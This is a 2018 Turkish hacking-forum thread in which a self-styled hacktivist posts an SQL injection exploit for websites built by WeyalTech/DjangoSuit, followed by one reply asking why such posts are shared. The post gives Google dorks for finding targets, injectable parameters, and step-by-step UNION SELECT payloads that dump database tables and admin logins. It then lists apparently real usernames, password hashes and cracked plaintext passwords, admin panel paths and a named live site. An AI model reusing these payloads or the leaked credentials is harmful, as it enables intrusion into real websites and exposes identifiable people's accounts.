Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Designed By WeyalTech Developed By DjangoSuit SQL Inj
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,386 / 1,386
Deneyim: 44 / 100
Rep Sayısı: 2873
Mesaj Sayısı: 6503
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Designed By WeyalTech Developed By DjangoSuit SQL Inj
04.07.2018 14:23
################################################################################​#################

# Exploit Title : Designed By WeyalTech Developed By DjangoSuit Company Afghanistan SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/07/2018
# Vendor Homepages : weyaltech.com ~ djangosuit.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Another Title : Designed by WeyalTech DjangoSuit Web Development Company Afghanistan SQL Injection Vulnerability

# Google Dorks :

intext:''Designed by WeyalTech''

intext:''Copyright © 2013 DjangoSuit.com''

intext:''Developed by DjangoSuit.com''

# Exploits :

/fullstory.php?id=[SQL Inj]

/images.php?im_album_id=[ID-Number]&limit=[ID-Number]&nxt=[SQL Inj]

/category.php?CatID=[ID-Number]&limit=[ID-Number]&nxt=[SQL Inj]

/images.php?im_album_id=[SQL Inj]

/category.php?CatID=[SQL Inj]

/videos.php?vidcat=[SQL Inj]

/video_fullstory.php?vidid=[SQL Inj]

Below is the Manually SQL Injection Attack Scenario =>

Check Version of the Database Information =>

127.0.0.1/fullstory.php?id=-68456+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--%20-

Check Table Names of the Database Information =>

127.0.0.1/fullstory.php?id=-68456+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15+fr​​om+information_schema.tables+where+table_schema=database()--%20-

Check Column + Table Name of the Database Information =>

127.0.0.1/fullstory.php?id=-68456+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15+f​​rom+information_schema.columns+where+table_name=0x7573657273--%20-

Check Administrators Owners Login Name and Password Information =>

127.0.0.1/fullstory.php?id=-68456+union+select+1,2,group_concat(login,0x3a,password),4,5,6,7,8,9,10,11,12,13​​,14,15+from+users-- -

admin:127498072c4615a301b5695af88ad47c
Samiullah Elam:e3fb7e8333d762d2f19ae811adbc6619
Gul-Sarai1:87a49a29def42b847f958deee851e6bf
Farid-Matoonwal:c8184106e280eeade72d27d99b32433f

127498072c4615a301b5695af88ad47c MD5 : weyaleya4Dol
e3fb7e8333d762d2f19ae811adbc6619 MD5 : Bator-Zwan
87a49a29def42b847f958deee851e6bf MD5 : De-Zra-Tasal1
c8184106e280eeade72d27d99b32433f MD5 : Rohi-Baba

Administration Control Panel Paths =>

/cp/login.php
/admin/login/?next=/admin/

################################################################################​#################

# Example Site => rohi.af/fullstory.php?id=68456%27 => [ Proof of Concept ] => archive.is/xJm1D

# SQL Database Errors =>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

You're seeing this error because you have DEBUG = True in your Django settings file.
Change that to False, and Django will display a standard page generated by the handler for this status code. #68456

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti
Rep Verenler: Einstein
Einstein
*
avatar
Yüzbaşı
Durum: Çevrimdışı
Seviye Puanı: 13
Yaşam Puanı: 93 / 302
Deneyim: 11 / 100
Rep Sayısı: 37
Mesaj Sayısı: 198
Üyelik Tarihi: 15.09.2017
     
Yorum: #2
Cvp: Designed By
05.07.2018 14:38
Hocam birsey sormak istiyorum bunlari niye paylasiyorsunuz

Körler memleketinde görmek bir hastalık sayılır.
- Cenap Şahabettin
Alinti



1 Ziyaretçi